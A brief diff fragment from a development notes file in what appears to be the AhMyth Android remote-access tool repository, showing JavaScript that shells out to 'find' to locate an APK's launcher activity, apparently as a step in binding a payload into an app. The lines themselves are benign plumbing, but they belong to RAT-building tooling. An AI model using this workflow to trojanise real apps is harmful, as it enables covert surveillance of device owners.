Morsmalleo/AhMyth/.github/Dev/Code_Updates.md

                 }

                 // This returns the absolute path of any apk's launcher activity file for Linux
-                // Need to implement OS detection for in order for a Windows equivalent of this function to work
                 $appCtrl.Log("Locating Launcher Activity...")
                 $appCtrl.Log();
                 exec('find -name "' + launcherActivity + '"', { cwd: apkFolder }, (error, stdout, stderr) => {